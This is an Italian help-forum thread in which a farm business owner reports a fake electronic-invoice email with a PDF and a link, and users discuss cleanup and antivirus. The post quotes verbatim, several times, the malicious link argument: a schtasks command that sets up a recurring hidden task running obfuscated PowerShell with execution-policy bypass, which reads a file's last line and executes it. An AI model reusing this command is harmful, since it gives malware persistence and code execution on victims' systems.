Aperti file sospetti arrivati con PEC. Molto probabilmente un virus. Come eliminare il rischio?

[nixa]

Buongiorno
Mi scuso per il disturbo. Oggi sulla nostra pec aziendale (azienda agricola) sono arrivati con una email che indicava come fattura elettronica dei file allegati: un pdf e un link. il pdf non si apre e link apparentemente non fa nulla. Mi insospettisco. Non so se allegare qui i due file che potrebbero (sono quasi sicuro essere virus).
Il link aveva con argomento: C:\Windows\System32\schtasks.exe /F /Create /sc minute /MO 5 /TN "AI" /ST 04:21 /TR "cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Vedo che avvia un task che itera: cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Che cosa è questo ultimo lungo comando invocato da schtasks?
Ho norton security installato e aggiornato che non rileva nessuna minaccia ne postando i file allegati sui siti di scansione rileva alcuna minaccia.
Il task AI avviato dal link l'ho cancellato manualmente dai task, e ok. Ma il resto del comando cosa fa esattamente?

Grazie

 

[Utente cancellato 368991]

1 - Come fai a sapere che non si apre? Hai provato ad aprirlo? Se sì, al 99% sei infettato
2 - Idem per il link. Se lo hai aperto.. tanti auguri.
3 - Il comando sembra partire con un copiare i file da una cartella ad un'altra bypassando qualcosa ma non asprei dirti di più.
4 - Norton Security è l'AV peggiore che esista sul mercato

 

[meiyo]

Buongiorno
Mi scuso per il disturbo. Oggi sulla nostra pec aziendale (azienda agricola) sono arrivati con una email che indicava come fattura elettronica dei file allegati: un pdf e un link. il pdf non si apre e link apparentemente non fa nulla. Mi insospettisco. Non so se allegare qui i due file che potrebbero (sono quasi sicuro essere virus).
Il link aveva con argomento: C:\Windows\System32\schtasks.exe /F /Create /sc minute /MO 5 /TN "AI" /ST 04:21 /TR "cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Vedo che avvia un task che itera: cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"

Che cosa è questo ultimo lungo comando invocato da schtasks?
Ho norton security installato e aggiornato che non rileva nessuna minaccia ne postando i file allegati sui siti di scansione rileva alcuna minaccia.
Il task AI avviato dal link l'ho cancellato manualmente dai task, e ok. Ma il resto del comando cosa fa esattamente?

Grazie

Ma l'indirizzo mail dal quale proveniva questo messaggio lo conoscevate? Perché se non era un vostro cliente io non avrei mai aperto.
Comunque ad un mio cliente cosa simile avvenuta tramite pec e pur avendo kaspersky attivo si è installato un task che favoriva eventuali intrusioni.
Dato che io non mi sono fidato, ho consigliato al cliente visto che avevamo una immagine recente, di ripristinare e di aggiornare tramite i dati di backup giornalieri

 

[nixa]

Buongiorno, Grazie per le risposte. Purtroppo aperti sia file che link. Ho trovato il task avviato nell' scheduler e l'ho deregistrato. Ora il task non si riesegue. Come dicevo i file messi su siti di controllo di multipli antivirus non risultano nocivi ma io sono sicuro che sono virus. Vorrei evitare se possibile di formattare il PC. Come mi consigliate di "pulirlo"?
P.S. il file p7z è firmato con firma valida mi pare dalla regione Toscana quindi la pec sembrava vera, quindi chi ha fatto sto virus ha fatto anche firmare in qualche modo da un account Aruba la cosa.

 

[Ibernato]

Buongiorno, Grazie per le risposte. Purtroppo aperti sia file che link. Ho trovato il task avviato nell' scheduler e l'ho deregistrato. Ora il task non si riesegue. Come dicevo i file messi su siti di controllo di multipli antivirus non risultano nocivi ma io sono sicuro che sono virus. Vorrei evitare se possibile di formattare il PC. Come mi consigliate di "pulirlo"?
P.S. il file p7z è firmato con firma valida mi pare dalla regione Toscana quindi la pec sembrava vera, quindi chi ha fatto sto virus ha fatto anche firmare in qualche modo da un account Aruba la cosa.

Non conosco i comandi esatti di quello script ma io eviterei di inserire formazioni importanti, vista la situazione.
Prova ad eseguire le scansioni qui: https://forum.tomshw.it/threads/procedura-scansioni-preliminari.736474/
Ma io ti consiglio di formattare :)
Perchè aprire file che arrivano da fonti sconosciute?
Fallo in una macchina virtuale almeno (anche se alcuni malware riescono a bypassare anche la VM)

 

[Dragondj]

Di quanti kB era il pdf? e il link? Probabilmente se sono troppo piccoli di dimensione passano inosservati nell'analisi dell av.
Almeno una volta era cosi ora se hanno fixato il bug non saprei.
Inviato da SM-G930F tramite App ufficiale di Tom\'s Hardware Italia Forum

 

[meiyo]

Da quando è uscito WANNACRY tutte le suite antivirus hanno lavorato egregiamente.
Il problema non è l'antivirus, siamo noi, il nostro problema è la nostra curiosità cheuci spinge a partecipare alla gara "il mouse più veloce del West"